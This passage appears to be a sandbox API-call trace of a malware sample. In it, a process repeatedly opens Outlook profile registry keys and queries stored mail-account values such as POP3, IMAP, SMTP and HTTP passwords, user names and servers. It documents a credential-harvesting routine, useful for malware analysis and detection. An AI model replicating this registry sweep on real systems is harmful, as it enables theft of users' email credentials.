hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.298] RegCloseKey (hKey=0x95c) returned 0x0 [0249.298] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.298] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.298] RegCloseKey (hKey=0x95c) returned 0x0 [0249.298] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.298] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.298] RegCloseKey (hKey=0x95c) returned 0x0 [0249.298] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.298] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.298] RegCloseKey (hKey=0x95c) returned 0x0 [0249.298] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.298] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.298] RegCloseKey (hKey=0x95c) returned 0x0 [0249.298] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.298] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.298] RegCloseKey (hKey=0x95c) returned 0x0 [0249.298] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.298] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.299] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.299] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.299] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.299] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.299] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.299] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.299] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.299] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.299] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.299] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.299] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.299] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.299] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.299] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.299] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.299] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.299] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.300] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.300] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.300] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.300] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.300] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.300] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.300] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.300] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.300] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.300] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.300] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.300] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.300] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.300] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.300] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.300] RegCloseKey (hKey=0x95c) returned 0x0 [0249.300] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.301] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.301] RegCloseKey (hKey=0x95c) returned 0x0 [0249.301] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.301] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.301] RegCloseKey (hKey=0x95c) returned 0x0 [0249.301] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.301] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.301] RegCloseKey (hKey=0x95c) returned 0x0 [0249.301] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.301] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.301] RegCloseKey (hKey=0x95c) returned 0x0 [0249.301] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.301] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.301] RegCloseKey (hKey=0x95c) returned 0x0 [0249.301] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.301] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.301] RegCloseKey (hKey=0x95c) returned 0x0 [0249.301] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.301] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.301] RegCloseKey (hKey=0x95c) returned 0x0 [0249.301] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.301] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.301] RegCloseKey (hKey=0x95c) returned 0x0 [0249.301] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.302] RegCloseKey (hKey=0x95c) returned 0x0 [0249.302] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.302] RegCloseKey (hKey=0x95c) returned 0x0 [0249.302] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.302] RegCloseKey (hKey=0x95c) returned 0x0 [0249.302] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.302] RegCloseKey (hKey=0x95c) returned 0x0 [0249.302] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.302] RegCloseKey (hKey=0x95c) returned 0x0 [0249.302] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.302] RegCloseKey (hKey=0x95c) returned 0x0 [0249.302] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.302] RegCloseKey (hKey=0x95c) returned 0x0 [0249.302] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.302] RegCloseKey (hKey=0x95c) returned 0x0 [0249.302] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.302] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.303] RegCloseKey (hKey=0x95c) returned 0x0 [0249.303] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9907df9e4a472f499f281fc91ee2bca1", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.303] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.303] RegCloseKey (hKey=0x95c) returned 0x0 [0249.303] LocalFree (hMem=0x5d67220) returned 0x0 [0249.303] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0xb, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="b4c13fbaf5f22f44b93e8bdd93521484", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.303] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.303] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d66960 [0249.303] wsprintfA (in: param_1=0x5d66960, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484") returned 88 [0249.303] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.303] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.303] RegCloseKey (hKey=0x95c) returned 0x0 [0249.303] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.303] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.303] RegCloseKey (hKey=0x95c) returned 0x0 [0249.303] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.303] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.303] RegCloseKey (hKey=0x95c) returned 0x0 [0249.303] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.303] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: 